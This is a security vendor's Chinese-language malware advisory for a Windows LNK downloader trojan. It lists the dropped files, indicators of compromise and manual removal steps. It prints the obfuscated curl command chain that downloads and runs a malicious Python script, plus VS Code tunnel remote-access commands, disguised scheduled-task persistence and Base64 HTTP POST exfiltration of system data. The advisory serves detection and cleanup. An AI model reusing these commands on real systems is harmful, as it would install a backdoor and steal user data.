Trojan.LNK.DOWNLOADER.D

2024年10月2日

分析者: Neljorn Nathaniel Aguas

HEUR:Trojan.WinLNK.Agent.gen (KASPERSKY)

平台:

Windows

总体风险等级:

潜在破坏:

潜在分布:

感染次数:

信息暴露:

恶意软件类型:
Trojan
有破坏性？:
没有
加密？:
In the Wild:
是的

概要

感染途徑: 从互联网上下载, 下载了其他恶意软件

它以文件的形式出现在系统中，可能是其他恶意软件投放的，或者是用户在访问恶意网站时无意中下载的。

技术详细信息

文件大小: 2,044 bytes

报告日期: LNK

初始樣本接收日期: 2024年9月30日

Payload: 植入文件, 连接到 URL/Ip

新病毒详细信息

它以文件的形式出现在系统中，可能是其他恶意软件投放的，或者是用户在访问恶意网站时无意中下载的。

安装

它植入下列文件：

%AppDataLocal%\Microsoft\Python\update.py
%AppDataLocal%\Microsoft\python.zip
- After extracting to %AppDataLocal%\Microsoft\Python:
  - _asyncio.pyd
  - _bz2.pyd
  - _ctypes.pyd
  - _decimal.pyd
  - _elementtree.pyd
  - _hashlib.pyd
  - _lzma.pyd
  - _msi.pyd
  - _multiprocessing.pyd
  - _overlapped.pyd
  - _queue.pyd
  - _socket.pyd
  - _sqlite3.pyd
  - _ssl.pyd
  - _uuid.pyd
  - _wmi.pyd
  - _zoneinfo.pyd
  - libcrypto-3.dll
  - libffi-8.dll
  - libssl-3.dll
  - LICENSE.txt
  - pyexpat.pyd
  - python.cat
  - python.exe
  - python.zip
  - python3.dll
  - python312._pth
  - python312.dll
  - python312.zip
  - pythonw.exe
  - select.pyd
  - sqlite3.dll
  - unicodedata.pyd
  - vcruntime140_1.dll
  - vcruntime140.dll
  - winsound.pyd

它添加下列进程：

"%System%\cmd.exe" /c start msg {Username} "安裝成功" & c^u^r^l -s -k https://www.{BLOCKED}n.org/ftp/python/3.12.5/python-3.12.5-embed-amd64.zip -o "%AppDataLocal%\Microsoft\python.zip" & timeout 10 & mkdir "%AppDataLocal%\Microsoft\Python" & tar -xf "%AppDataLocal%\Microsoft\python.zip" -C "%AppDataLocal%\Microsoft\Python" & c^u^r^l -s -k https://{BLOCKED}e.ee/r/DQjrd/0 -o "%AppDataLocal%\Microsoft\Python\update.py" & start "" /B "%AppDataLocal%\Microsoft\Python\pythonw.exe" "%AppDataLocal%\Microsoft\Python\update.py"

它创建下列文件夹：

%AppDataLocal%\Microsoft\Python

下载例程

它使用下列文件名保存下载的文件：

%AppDataLocal%\Microsoft\python.zip → legitimate Python 3.12.5 x64 zip file
%AppDataLocal%\Microsoft\Python\update.py → malicious Python code

其他详细信息

该程序执行以下操作：

It sends Windows message "安裝成功" translated to "Installation successful".
It downloads a legitimate 64-bit Python 3.12.5 embedded zip file and extracts its contents.
It downloads a malicious Python script file from a URL and executes using the extracted Python package.
It requires the following command line tools to proceed with its intended routine:
- curl
- tar
The executed Python code does the following:
- It fetches running processes using tasklist command.
- It connects to the following URL(s) to download its component file(s):
  - https://{BLOCKED}95.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli.zip
- It saves the files it downloads using the following names:
  - %AppDataLocal%\Microsoft\vscode.zip → contains a file named code.exe
- It adds the following folders:
  - %AppDataLocal%\Microsoft\VSCode
- It extracts the zip file into the created folder with the following filename:
  - %AppDataLocal%\Microsoft\VSCode\code.exe
- After extraction, it deletes the previously downloaded zip file.
- It adds the following processes:
  - %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe tunnel --accept-server-license-terms user logout"
  - %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe --locale en-US tunnel --accept-server-license-terms --name "{Computer Name}"
    - Saves the output into the following files:
      - %AppDataLocal%\Microsoft\VSCode\output.txt
      - %AppDataLocal%\Microsoft\VSCode\output2.txt
  - schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /st 08:00 /sc HOURLY /mo 4 /f
  - schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /sc ONLOGON /ru SYSTEM /rl HIGHEST /f
- It retrieves the following information from the affected system:
  - System Locale
  - Computer Name
  - Username
  - User Domain
  - %Program Files% Contents
  - %ProgramData% Contents
  - %System Root%\Users Contents
- It encodes the collected information into a Base64 format.
- It sends the gathered information via HTTP POST to the following URL:
  - http://{BLOCKED}o.com/r/2yxp98b3/{Encoded Base64 String of Collected information}
- It adds the following scheduled tasks:
  - If executed as user:
    - Location: {Root Directory}
      Name: MicrosoftHealthcareMonitorNode
      Trigger: One time at 8:00 AM on {Scheduled Task Create Time} → After triggered, repeat every 04:00:00 indefinitely.
      Action: Start a program → %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py
  - If executed as an administrator:
    - Location: {Root Directory}
      Name: MicrosoftHealthcareMonitorNode
      Trigger: At log on of any user
      Action: Start a program → %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py

解决方案

最小扫描引擎: 9.800

First VSAPI Pattern File: 19.624.03

VSAPI 第一样式发布日期: 2024年10月1日

VSAPI OPR样式版本: 19.625.00

VSAPI OPR样式发布日期: 2024年10月2日

Step 1

对于Windows ME和XP用户，在扫描前，请确认已禁用系统还原功能，才可全面扫描计算机。

Step 2

注意：在此恶意软件/间谍软件/灰色软件执行期间，并非所有文件、文件夹和注册表键值和项都会安装到您的计算机上。这可能是由于不完整的安装或其他操作系统条件所致。如果您没有找到相同的文件/文件夹/注册表信息，请继续进行下一步操作。

Step 3

重启进入安全模式

[ 更多 ]

Step 5

搜索和删除这些文件

[ 更多 ]

有些组件文件可能是隐藏的。请确认在"高级选项"中已选中搜索隐藏文件和文件夹复选框，使查找结果包括所有隐藏文件和文件夹。

%AppDataLocal%\Microsoft\Python\update.py
%AppDataLocal%\Microsoft\Python\_asyncio.pyd
%AppDataLocal%\Microsoft\Python\_bz2.pyd
%AppDataLocal%\Microsoft\Python\_ctypes.pyd
%AppDataLocal%\Microsoft\Python\_decimal.pyd
%AppDataLocal%\Microsoft\Python\_elementtree.pyd
%AppDataLocal%\Microsoft\Python\_hashlib.pyd
%AppDataLocal%\Microsoft\Python\_lzma.pyd
%AppDataLocal%\Microsoft\Python\_msi.pyd
%AppDataLocal%\Microsoft\Python\_multiprocessing.pyd
%AppDataLocal%\Microsoft\Python\_overlapped.pyd
%AppDataLocal%\Microsoft\Python\_queue.pyd
%AppDataLocal%\Microsoft\Python\_socket.pyd
%AppDataLocal%\Microsoft\Python\_sqlite3.pyd
%AppDataLocal%\Microsoft\Python\_ssl.pyd
%AppDataLocal%\Microsoft\Python\_uuid.pyd
%AppDataLocal%\Microsoft\Python\_wmi.pyd
%AppDataLocal%\Microsoft\Python\_zoneinfo.pyd
%AppDataLocal%\Microsoft\Python\libcrypto-3.dll
%AppDataLocal%\Microsoft\Python\libffi-8.dll
%AppDataLocal%\Microsoft\Python\libssl-3.dll
%AppDataLocal%\Microsoft\Python\LICENSE.txt
%AppDataLocal%\Microsoft\Python\pyexpat.pyd
%AppDataLocal%\Microsoft\Python\python.cat
%AppDataLocal%\Microsoft\Python\python.exe
%AppDataLocal%\Microsoft\Python\python.zip
%AppDataLocal%\Microsoft\Python\python3.dll
%AppDataLocal%\Microsoft\Python\python312._pth
%AppDataLocal%\Microsoft\Python\python312.dll
%AppDataLocal%\Microsoft\Python\python312.zip
%AppDataLocal%\Microsoft\Python\pythonw.exe
%AppDataLocal%\Microsoft\Python\select.pyd
%AppDataLocal%\Microsoft\Python\sqlite3.dll
%AppDataLocal%\Microsoft\Python\unicodedata.pyd
%AppDataLocal%\Microsoft\Python\vcruntime140_1.dll
%AppDataLocal%\Microsoft\Python\vcruntime140.dll
%AppDataLocal%\Microsoft\Python\winsound.pyd
%AppDataLocal%\Microsoft\VSCode\code.exe
%AppDataLocal%\Microsoft\VSCode\output.txt
%AppDataLocal%\Microsoft\VSCode\output2.txt
%AppDataLocal%\Microsoft\python.zip
%AppDataLocal%\Microsoft\vscode.zip

DATA_GENERIC_FILENAME_1

在查找范围下拉列表中，选择

我的电脑然后回车确认。

一旦找到，请选择文件，然后按下SHIFT+DELETE彻底删除文件。

对剩余的文件重复第2到4步： %AppDataLocal%\Microsoft\Python\update.py
%AppDataLocal%\Microsoft\Python\_asyncio.pyd
%AppDataLocal%\Microsoft\Python\_bz2.pyd
%AppDataLocal%\Microsoft\Python\_ctypes.pyd
%AppDataLocal%\Microsoft\Python\_decimal.pyd
%AppDataLocal%\Microsoft\Python\_elementtree.pyd
%AppDataLocal%\Microsoft\Python\_hashlib.pyd
%AppDataLocal%\Microsoft\Python\_lzma.pyd
%AppDataLocal%\Microsoft\Python\_msi.pyd
%AppDataLocal%\Microsoft\Python\_multiprocessing.pyd
%AppDataLocal%\Microsoft\Python\_overlapped.pyd
%AppDataLocal%\Microsoft\Python\_queue.pyd
%AppDataLocal%\Microsoft\Python\_socket.pyd
%AppDataLocal%\Microsoft\Python\_sqlite3.pyd
%AppDataLocal%\Microsoft\Python\_ssl.pyd
%AppDataLocal%\Microsoft\Python\_uuid.pyd
%AppDataLocal%\Microsoft\Python\_wmi.pyd
%AppDataLocal%\Microsoft\Python\_zoneinfo.pyd
%AppDataLocal%\Microsoft\Python\libcrypto-3.dll
%AppDataLocal%\Microsoft\Python\libffi-8.dll
%AppDataLocal%\Microsoft\Python\libssl-3.dll
%AppDataLocal%\Microsoft\Python\LICENSE.txt
%AppDataLocal%\Microsoft\Python\pyexpat.pyd
%AppDataLocal%\Microsoft\Python\python.cat
%AppDataLocal%\Microsoft\Python\python.exe
%AppDataLocal%\Microsoft\Python\python.zip
%AppDataLocal%\Microsoft\Python\python3.dll
%AppDataLocal%\Microsoft\Python\python312._pth
%AppDataLocal%\Microsoft\Python\python312.dll
%AppDataLocal%\Microsoft\Python\python312.zip
%AppDataLocal%\Microsoft\Python\pythonw.exe
%AppDataLocal%\Microsoft\Python\select.pyd
%AppDataLocal%\Microsoft\Python\sqlite3.dll
%AppDataLocal%\Microsoft\Python\unicodedata.pyd
%AppDataLocal%\Microsoft\Python\vcruntime140_1.dll
%AppDataLocal%\Microsoft\Python\vcruntime140.dll
%AppDataLocal%\Microsoft\Python\winsound.pyd
%AppDataLocal%\Microsoft\VSCode\code.exe
%AppDataLocal%\Microsoft\VSCode\output.txt
%AppDataLocal%\Microsoft\VSCode\output2.txt
%AppDataLocal%\Microsoft\python.zip
%AppDataLocal%\Microsoft\vscode.zip

Step 6

搜索和删除这些文件夹

[ 更多 ]

请确认在高级选项中已选中搜索隐藏文件和文件夹复选框，使查找结果包括所有隐藏文件夹。;
%AppDataLocal%\Microsoft\Python
%AppDataLocal%\Microsoft\VSCode

删除恶意软件/灰色软件/间谍软件文件夹：

右键单击然后搜索...或查找...（具体取决于您运行的Windows版本）。

在“要搜索的文件或文件夹名为”输入框，输入：

%AppDataLocal%\Microsoft\Python
%AppDataLocal%\Microsoft\VSCode

在查找范围下拉列表中，选择
我的电脑然后回车确认。

一旦找到，请选择文件夹，然后按下SHIFT+DELETE彻底删除文件夹。

对剩余的文件夹重复第2到4步： %AppDataLocal%\Microsoft\Python
%AppDataLocal%\Microsoft\VSCode

Step 7

重启进入正常模式，使用亚信安全产品扫描计算机，检测Trojan.LNK.DOWNLOADER.D文件如果检测到的文件已被亚信安全产品清除、删除或隔离，则无需采取进一步措施。可以选择直接删除隔离的文件。请参阅知识库页面了解详细信息。